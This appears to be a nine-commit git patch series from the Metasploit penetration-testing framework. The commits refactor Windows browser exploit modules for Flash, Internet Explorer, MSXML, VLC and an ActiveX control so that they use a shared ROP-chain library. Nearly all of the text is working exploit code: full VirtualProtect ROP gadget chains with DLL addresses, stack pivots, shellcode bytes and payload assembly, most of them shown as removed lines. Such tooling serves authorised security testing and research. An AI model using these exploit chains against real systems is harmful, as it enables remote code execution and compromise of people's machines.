From 631a06f3bbaea120d38f43d433caac9c51316acc Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 5 Oct 2012 10:55:55 -0500 Subject: [PATCH 1/9] Adopt RopDb for adobe_flashplayer_flash10o.rb --- .../browser/adobe_flashplayer_flash10o.rb | 35 ++++--------------- 1 file changed, 6 insertions(+), 29 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index ab51e56130..c481b5ae92 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, @@ -182,40 +183,12 @@ class Metasploit3 < Msf::Exploit::Remote end #Targets that don't need ROP - rop = '' pivot = "\xb8\x0c\x0c\x0c\x0c" #MOV EAX,0x0c0c0c0c pivot << "\xff\xe0" #JMP EAX pivot << "\x41" #Pad #Targets that need ROP if my_target['Rop'] - #Target Addr=0x0c0c0c0c - rop = - [ - 0x7c376402, # POP EBP # RETN [msvcr71.dll] - 0x7c376402, # skip 4 bytes [msvcr71.dll] - 0x7c347f97, # POP EAX # RETN [msvcr71.dll] - 0xfffff800, # Value to negate, will become 0x00000201 (dwSize) - 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] - 0x7c354901, # POP EBX # RETN [msvcr71.dll] - 0xffffffff, - 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] - 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] - 0x7c344f87, # POP EDX # RETN [msvcr71.dll] - 0xffffffc0, # Value to negate, will become 0x00000040 - 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] - 0x7c34d201, # POP ECX # RETN [msvcr71.dll] - 0x7c38b001, # &Writable location [msvcr71.dll] - 0x7c34b8d7, # POP EDI # RETN [msvcr71.dll] - 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] - 0x7c364802, # POP ESI # RETN [msvcr71.dll] - 0x7c3415a2, # JMP [EAX] [msvcr71.dll] - 0x7c347f97, # POP EAX # RETN [msvcr71.dll] - 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] - 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] - 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll] - ].pack("V*") - #Target Addr=0x11111110 pivot = [ @@ -223,11 +196,15 @@ class Metasploit3 < Msf::Exploit::Remote my_target['Pivot'], # ROP Pivot 0x7c346b52, # EAX (POP ESP; RETN) ].pack('V*') + + #Target Addr=0x0c0c0c0c + p = generate_rop_payload('java', payload.encoded) + else + p = rop + payload.encoded end arch = Rex::Arch.endian(my_target.arch) - p = rop + payload.encoded shellcode = Rex::Text.to_unescape(p, arch) pivot = Rex::Text.to_unescape(pivot, arch) From 98931e339a3a4a2c78aa08b4fd48b9e0070dc7a2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 5 Oct 2012 11:05:19 -0500 Subject: [PATCH 2/9] Adopt RopDb for adobe_flash_rtmp.rb --- .../windows/browser/adobe_flash_rtmp.rb | 42 ++----------------- 1 file changed, 4 insertions(+), 38 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb index 0489ce1aa0..6d86a85d34 100644 --- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb +++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ @@ -122,53 +123,18 @@ class Metasploit3 < Msf::Exploit::Remote end end - def junk(n=4) - return rand_text_alpha(n).unpack("V").first - end - - def nop - return make_nops(4).unpack("V").first - end - def ret(t) return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll end - def popret(t) - return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll - end - def get_rop_chain(t) - - # ROP chains generated by mona.py - See corelan.be print_status("Using msvcrt ROP") - rop = - [ - 0x77c4e392, # POP EAX # RETN - 0x77c11120, # <- *&VirtualProtect() - 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77c2dd6c, - 0x77c4ec00, # POP EBP # RETN - 0x77c35459, # ptr to 'push esp # ret' - 0x77c47705, # POP EBX # RETN - 0x00001000, # EBX - 0x77c3ea01, # POP ECX # RETN - 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) - 0x77c46100, # POP EDI # RETN - 0x77c46101, # ROP NOP (-> edi) - 0x77c4d680, # POP EDX # RETN - 0x00000040, # newProtect (0x40) (-> edx) - 0x77c4e392, # POP EAX # RETN - nop, # NOPS (-> eax) - 0x77c12df9, # PUSHAD # RETN - ].pack("V*") + p = "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem + p << payload.encoded code = ret(t) code << rand_text(119) - code << rop - code << "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem - code << payload.encoded + code << generate_rop_payload('msvcrt', p, {'target'=>'xp'}) offset = 2616 - code.length code << rand_text(offset) code << [ t['StackPivot'] ].pack("V") From 1268614d5456222430b5513aac2b0f02dbe72dba Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 5 Oct 2012 11:15:53 -0500 Subject: [PATCH 3/9] Adopt RopDb for adobe_flash_mp4_cprt.rb --- .../windows/browser/adobe_flash_mp4_cprt.rb | 62 ++----------------- 1 file changed, 4 insertions(+), 58 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index d4240da6f3..930590bfbb 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML - + include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, @@ -127,10 +127,6 @@ class Metasploit3 < Msf::Exploit::Remote return rand_text_alpha(n).unpack("V").first end - def nop - return make_nops(4).unpack("V").first - end - def get_payload(t, cli) if t['Rop'].nil? @@ -144,64 +140,14 @@ class Metasploit3 < Msf::Exploit::Remote # No rop. Just return the payload. return code if t['Rop'].nil? - # Both ROP chains generated by mona.py - See corelan.be - case t['Rop'] - when :msvcrt - print_status("Using msvcrt ROP") - exec_size = code.length - rop = - [ - 0x77c4e392, # POP EAX # RETN - 0x77c11120, # <- *&VirtualProtect() - 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77c2dd6c, - 0x77c4ec00, # POP EBP # RETN - 0x77c35459, # ptr to 'push esp # ret' - 0x77c47705, # POP EBX # RETN - exec_size, # EBX - 0x77c3ea01, # POP ECX # RETN - 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) - 0x77c46100, # POP EDI # RETN - 0x77c46101, # ROP NOP (-> edi) - 0x77c4d680, # POP EDX # RETN - 0x00000040, # newProtect (0x40) (-> edx) - 0x77c4e392, # POP EAX # RETN - nop, # NOPS (-> eax) - 0x77c12df9, # PUSHAD # RETN - ].pack("V*") - - when :jre - print_status("Using JRE ROP") - exec_size = 0xffffffff - code.length + 1 - rop = - [ - 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN - exec_size, # Value to NEG - 0x7c347f98, # RETN (ROP NOP) - 0x7c3415a2, # JMP [EAX] - 0xffffffff, - 0x7c376402, # skip 4 bytes - 0x7c351e05, # NEG EAX # RETN - 0x7c345255, # INC EBX # FPATAN # RETN - 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN - 0x7c344f87, # POP EDX # RETN - 0xffffffc0, # Value to negate, will become 0x00000040 - 0x7c351eb1, # NEG EDX # RETN - 0x7c34d201, # POP ECX # RETN - 0x7c38b001, # &Writable location - 0x7c347f97, # POP EAX # RETN - 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] - 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN - 0x7c345c30, # ptr to 'push esp # ret ' - ].pack("V*") - end + rop_name = (t['Rop'] and t['Rop'] == :msvcrt) ? 'msvcrt' : 'java' + rop_target = (rop_name == 'msvcrt') ? 'xp' : '' pivot = [t['ppr']].pack('V*') #POP/POP/RET pivot << [junk].pack('V*') pivot << [t.ret].pack('V*') - code = pivot + rop + code + code = generate_rop_payload(rop_name, code, {'target'=>rop_target}) return code end From 6fc8790dd7251fcc2c311e2046ce16a20e032552 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 5 Oct 2012 12:17:19 -0500 Subject: [PATCH 4/9] Adopt RopDb for ms12_037_same_id.rb --- .../windows/browser/ms12_037_same_id.rb | 65 +++---------------- 1 file changed, 8 insertions(+), 57 deletions(-) diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb index 5855635273..ae9a39555c 100644 --- a/modules/exploits/windows/browser/ms12_037_same_id.rb +++ b/modules/exploits/windows/browser/ms12_037_same_id.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, @@ -105,14 +106,6 @@ class Metasploit3 < Msf::Exploit::Remote end end - def junk(n=4) - return rand_text_alpha(n).unpack("V").first - end - - def nop - return make_nops(4).unpack("V").first - end - def ret(t) case t['Rop'] when :msvcrt @@ -132,63 +125,21 @@ class Metasploit3 < Msf::Exploit::Remote end def get_rop_chain(t) + pivot = ret(t) * 27 + pivot << popret(t) + pivot << [t.ret].pack("V") # stackpivot - adjust = ret(t) * 27 - adjust << popret(t) - adjust << [t.ret].pack("V") # stackpivot - - # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") - rop = - [ - 0x77c4e392, # POP EAX # RETN - 0x77c11120, # <- *&VirtualProtect() - 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77c2dd6c, - 0x77c4ec00, # POP EBP # RETN - 0x77c35459, # ptr to 'push esp # ret' - 0x77c47705, # POP EBX # RETN - 0x00001000, # EBX - 0x77c3ea01, # POP ECX # RETN - 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) - 0x77c46100, # POP EDI # RETN - 0x77c46101, # ROP NOP (-> edi) - 0x77c4d680, # POP EDX # RETN - 0x00000040, # newProtect (0x40) (-> edx) - 0x77c4e392, # POP EAX # RETN - nop, # NOPS (-> eax) - 0x77c12df9, # PUSHAD # RETN - ].pack("V*") + rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot}) - when :jre + else print_status("Using JRE ROP") - rop = - [ - 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN - 0x00001000, # (dwSize) - 0x7c347f98, # RETN (ROP NOP) - 0x7c3415a2, # JMP [EAX] - 0xffffffff, - 0x7c376402, # skip 4 bytes - 0x7c345255, # INC EBX # FPATAN # RETN - 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN - 0x7c344f87, # POP EDX # RETN - 0x00000040, # flNewProtect - 0x7c34d201, # POP ECX # RETN - 0x7c38b001, # &Writable location - 0x7c347f97, # POP EAX # RETN - 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] - 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN - 0x7c345c30, # ptr to 'push esp # ret ' - ].pack("V*") + rop = generate_rop_payload('java', '', {'pivot'=>pivot}) end - code = adjust - code << rop - return code + return rop end From d9278d82f85ef9e16c24b51233018b96e595808f Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 5 Oct 2012 12:20:41 -0500 Subject: [PATCH 5/9] Adopt RopDb for msxml_get_definition_code_exec.rb --- .../browser/msxml_get_definition_code_exec.rb | 58 ++----------------- 1 file changed, 5 insertions(+), 53 deletions(-) diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb index 8b379d1142..11134f5c42 100644 --- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb +++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, @@ -153,14 +154,6 @@ class Metasploit3 < Msf::Exploit::Remote end end - def junk(n=4) - return rand_text_alpha(n).unpack("V").first - end - - def nop - return make_nops(4).unpack("V").first - end - def ret(t) case t['Rop'] when :msvcrt @@ -180,7 +173,6 @@ class Metasploit3 < Msf::Exploit::Remote end def get_rop_chain(t) - if t['RandomHeap'] adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c adjust << ret(t) @@ -196,54 +188,14 @@ class Metasploit3 < Msf::Exploit::Remote case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") - rop = - [ - 0x77c4e392, # POP EAX # RETN - 0x77c11120, # <- *&VirtualProtect() - 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77c2dd6c, - 0x77c4ec00, # POP EBP # RETN - 0x77c35459, # ptr to 'push esp # ret' - 0x77c47705, # POP EBX # RETN - 0x00001000, # EBX - 0x77c3ea01, # POP ECX # RETN - 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) - 0x77c46100, # POP EDI # RETN - 0x77c46101, # ROP NOP (-> edi) - 0x77c4d680, # POP EDX # RETN - 0x00000040, # newProtect (0x40) (-> edx) - 0x77c4e392, # POP EAX # RETN - nop, # NOPS (-> eax) - 0x77c12df9, # PUSHAD # RETN - ].pack("V*") + rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust}) - when :jre + else print_status("Using JRE ROP") - rop = - [ - 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN - 0x00001000, # (dwSize) - 0x7c347f98, # RETN (ROP NOP) - 0x7c3415a2, # JMP [EAX] - 0xffffffff, - 0x7c376402, # skip 4 bytes - 0x7c345255, # INC EBX # FPATAN # RETN - 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN - 0x7c344f87, # POP EDX # RETN - 0x00000040, # flNewProtect - 0x7c34d201, # POP ECX # RETN - 0x7c38b001, # &Writable location - 0x7c347f97, # POP EAX # RETN - 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] - 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN - 0x7c345c30, # ptr to 'push esp # ret ' - ].pack("V*") + rop = generate_rop_payload('java','',{'pivot'=>adjust}) end - code = adjust - code << rop - return code + return rop end def get_easy_spray(t, js_code, js_nops) From 9a53a4962525d6846cb05dfb044434484c48e840 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 5 Oct 2012 12:54:16 -0500 Subject: [PATCH 6/9] RopDb for vlc_amv.rb --- modules/exploits/windows/browser/vlc_amv.rb | 39 ++------------------- 1 file changed, 2 insertions(+), 37 deletions(-) diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb index ada101b729..b934a25879 100644 --- a/modules/exploits/windows/browser/vlc_amv.rb +++ b/modules/exploits/windows/browser/vlc_amv.rb @@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, @@ -146,43 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote #Generate our payload if my_target['Rop'] #IE 8 targets - #mona.py tekniq! + Payload - code = [ - 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) - 0x7c37a140, # Make EAX readable - 0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll) - 0x7c348b06, # EBP (NOP) - 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) - 0x7c37a140, # <- VirtualProtect() found in IAT - 0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll) - 0x7c346c0b, # Slide, so next gadget would write to correct stack location - 0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll) - 0x7c348b06, # EDI (filler) - 0x7c348b06, # will be patched at runtime (VP), then picked up into ESI - 0x7c348b06, # EBX (filler) - 0x7c376402, # POP EBP # RETN (msvcr71.dll) - 0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll) - 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) - 0xfffff82f, # size 20001 bytes - 0x7c351e05, # NEG EAX # RETN (MSVCR71.dll) - 0x7c354901, # POP EBX # RETN (MSVCR71.dll) - 0xffffffff, # pop value into ebx - 0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll) - 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll) - 0x7c34d201, # POP ECX # RETN (MSVCR71.dll) - 0x7c38b001, # RW pointer (lpOldProtect) (-> ecx) - 0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll) - 0x7c34b8d8, # ROP NOP (-> edi) - 0x7c344f87, # POP EDX # RETN (MSVCR71.dll) - 0xffffffc0, # value to negate, target value : 0x00000040, target: edx - 0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll) - 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) - 0x90909090, # NOPS (-> eax) - 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll) - ].pack('V*') - - #Append payload after the ROP chain - code << payload.encoded + code = generate_rop_payload('java', payload.encoded) #Align and 'jump' to our final payload at 0x0c0c0c0c ini_stage = [ From f92843c96ec7f70b19ec233e7bc14ab2605914e0 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 5 Oct 2012 13:49:17 -0500 Subject: [PATCH 7/9] RopDb for ie_execcommand_uaf.rb --- .../windows/browser/ie_execcommand_uaf.rb | 52 ++----------------- 1 file changed, 5 insertions(+), 47 deletions(-) diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index cb24f19783..52739b323c 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, @@ -138,31 +139,9 @@ class Metasploit3 < Msf::Exploit::Remote 0x77c4e392, # POP EAX # RETN 0x77c15ed5, # XCHG EAX, ESP # RETN ].pack("V*") - rop = - [ - 0x77C21891, # POP ESI # RETN - 0x0c0c0c04, # ESI - 0x77c4e392, # POP EAX # RETN - 0x77c11120, # <- *&VirtualProtect() - 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77c2dd6c, # XCHG EAX,ESI # ADD [EAX], AL # RETN - 0x77c4ec00, # POP EBP # RETN - 0x77c35459, # ptr to 'push esp # ret' - 0x77c47705, # POP EBX # RETN - exec_size, # EBX - 0x77c3ea01, # POP ECX # RETN - 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) - 0x77c46100, # POP EDI # RETN - 0x77c46101, # ROP NOP (-> edi) - 0x77c4d680, # POP EDX # RETN - 0x00000040, # newProtect (0x40) (-> edx) - 0x77c4e392, # POP EAX # RETN - nop, # NOPS (-> eax) - 0x77c12df9, # PUSHAD # RETN - ].pack("V*") + rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) - when :jre + else print_status("Using JRE ROP") exec_size = 0xffffffff - code.length + 1 if t['Random'] @@ -179,31 +158,10 @@ class Metasploit3 < Msf::Exploit::Remote 0x7c348b05 # XCHG EAX, ESP # RET ].pack("V*") end - rop = - [ - 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN - exec_size, # Value to negate, will become 0x00000201 (dwSize) - 0x7c347f98, # RETN (ROP NOP) - 0x7c3415a2, # JMP [EAX] - 0xffffffff, - 0x7c376402, # skip 4 bytes - 0x7c351e05, # NEG EAX # RETN - 0x7c345255, # INC EBX # FPATAN # RETN - 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN - 0x7c344f87, # POP EDX # RETN - 0xffffffc0, # Value to negate, will become 0x00000040 - 0x7c351eb1, # NEG EDX # RETN - 0x7c34d201, # POP ECX # RETN - 0x7c38b001, # &Writable location - 0x7c347f97, # POP EAX # RETN - 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] - 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN - 0x7c345c30, # ptr to 'push esp # ret ' - ].pack("V*") + rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) end - code = stack_pivot + rop + code - return code + return rop_payload end # Spray published by corelanc0d3r From 33db3d9610fad257b6dac83ea4ae2f90c41fb47e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 5 Oct 2012 14:09:59 -0500 Subject: [PATCH 8/9] RopDb for ntr_activex_check_bof.rb --- .../windows/browser/ntr_activex_check_bof.rb | 60 ++----------------- 1 file changed, 5 insertions(+), 55 deletions(-) diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb index 475b82f572..a707495b20 100644 --- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb +++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ @@ -257,14 +258,6 @@ class Metasploit3 < Msf::Exploit::Remote end end - def junk(n=4) - return rand_text_alpha(n).unpack("V")[0].to_i - end - - def nop - return make_nops(4).unpack("V")[0].to_i - end - def get_payload(t, cli) code = payload.encoded @@ -275,57 +268,14 @@ class Metasploit3 < Msf::Exploit::Remote case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") - exec_size = code.length - rop = [ - 0x77C21891, # POP ESI # RETN - 0x0c0c0c04, # ESI - 0x77c4e392, # POP EAX # RETN - 0x77c11120, # <- *&VirtualProtect() - 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77c2dd6c, # XCHG EAX,ESI # ADD [EAX], AL # RETN - 0x77c4ec00, # POP EBP # RETN - 0x77c35459, # ptr to 'push esp # ret' - 0x77c47705, # POP EBX # RETN - exec_size, # EBX - 0x77c3ea01, # POP ECX # RETN - 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) - 0x77c46100, # POP EDI # RETN - 0x77c46101, # ROP NOP (-> edi) - 0x77c4d680, # POP EDX # RETN - 0x00000040, # newProtect (0x40) (-> edx) - 0x77c4e392, # POP EAX # RETN - nop, # NOPS (-> eax) - 0x77c12df9, # PUSHAD # RETN - ].pack("V*") + rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'}) - when :jre + else print_status("Using JRE ROP") - exec_size = 0xffffffff - code.length + 1 - rop = [ - 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN - exec_size, # Value to negate, will become 0x00000201 (dwSize) - 0x7c347f98, # RETN (ROP NOP) - 0x7c3415a2, # JMP [EAX] - 0xffffffff, - 0x7c376402, # skip 4 bytes - 0x7c351e05, # NEG EAX # RETN - 0x7c345255, # INC EBX # FPATAN # RETN - 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN - 0x7c344f87, # POP EDX # RETN - 0xffffffc0, # Value to negate, will become 0x00000040 - 0x7c351eb1, # NEG EDX # RETN - 0x7c34d201, # POP ECX # RETN - 0x7c38b001, # &Writable location - 0x7c347f97, # POP EAX # RETN - 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] - 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN - 0x7c345c30, # ptr to 'push esp # ret ' - ].pack("V*") + rop_payload = generate_rop_payload('java', code) end - code = rop + code - return code + return rop_payload end def on_request_uri(cli, request) From 21ea77ff8bc82fa09338dda2d0919951f9c6f687 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 5 Oct 2012 15:40:37 -0500 Subject: [PATCH 9/9] Fix spaces --- modules/exploits/windows/browser/ie_execcommand_uaf.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index 52739b323c..82f6de7c9a 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -271,7 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote + |